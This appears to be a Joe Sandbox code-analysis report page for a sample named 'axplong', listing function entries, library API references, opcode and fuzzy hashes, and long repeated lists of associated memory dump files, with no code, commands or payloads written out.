                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                    • String ID: pContext
                                                                                                                                                                                                                                                    • API String ID: 3390424672-2046700901
                                                                                                                                                                                                                                                    • Opcode ID: cd3147d3b9ef49c61309b832fa08f0a5f4fd2cbebeb8f28b51d5666f9618a304
                                                                                                                                                                                                                                                    • Instruction ID: 73f7c57ce4ab1c52b40829b936a8e529e691b29b1177ab17e97a03b8ad31220f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd3147d3b9ef49c61309b832fa08f0a5f4fd2cbebeb8f28b51d5666f9618a304
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E611D236A002149BCF55BF28C4849AD7767AF473A0F194169E812DF342DB34ED018FD0
                                                                                                                                                                                                                                                    Function 006895F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_unlock
                                                                                                                                                                                                                                                    • String ID: P#g$P#g
                                                                                                                                                                                                                                                    • API String ID: 1418687624-973111119
                                                                                                                                                                                                                                                    • Opcode ID: 13b7df8ee108ce85c2e31682f80e76b76194fcc406ded0040db9b3197374cb48
                                                                                                                                                                                                                                                    • Instruction ID: 0f5b78fedb5d3497277f13d8dcc9119e26eae384c588ce91fd1802ad17d69c70
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13b7df8ee108ce85c2e31682f80e76b76194fcc406ded0040db9b3197374cb48
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD014C716002186BC718FB94D801EAA779FCF11710F00813EF54997701EA70E9445BAA
                                                                                                                                                                                                                                                    Function 00690B8C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 00690C07
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 00690C5A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Resource$AcquireConcurrency::details::Concurrency::details::_Lock::_ManagerManager::Reentrant
                                                                                                                                                                                                                                                    • String ID: @[m
                                                                                                                                                                                                                                                    • API String ID: 3303180142-3851931048
                                                                                                                                                                                                                                                    • Opcode ID: 721a8864bd4dc976cef7eb9c3306feda754d1513acd7552b7ffdcb2a6df380ed
                                                                                                                                                                                                                                                    • Instruction ID: ed9b71bbd21d4893f98d1819fb11dec2260638fda7c5cae619317a52755e7821
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 721a8864bd4dc976cef7eb9c3306feda754d1513acd7552b7ffdcb2a6df380ed
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2019664A49205DEEF60BBB8555135D67EB6F05300F14026EF505FBA82DE308E405355
                                                                                                                                                                                                                                                    Function 00672440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 0067247E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: P#g$P#g
                                                                                                                                                                                                                                                    • API String ID: 2659868963-973111119
                                                                                                                                                                                                                                                    • Opcode ID: f92568fff053eda34b244519ea4c2a1f4f312f7f086a569b658d6f204d7629c5
                                                                                                                                                                                                                                                    • Instruction ID: 38b7b6b04e9419140391560444f01c7ae632e796001a3d6e25a2d250399c6ea2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f92568fff053eda34b244519ea4c2a1f4f312f7f086a569b658d6f204d7629c5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36F0A0B591021D67C714FEE8D801D89B7EDDA16310B008A2AF644EB600F770FA448BA9
                                                                                                                                                                                                                                                    Function 00673400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00672AF0: ___std_exception_copy.LIBVCRUNTIME ref: 00672B23
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 0067343E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
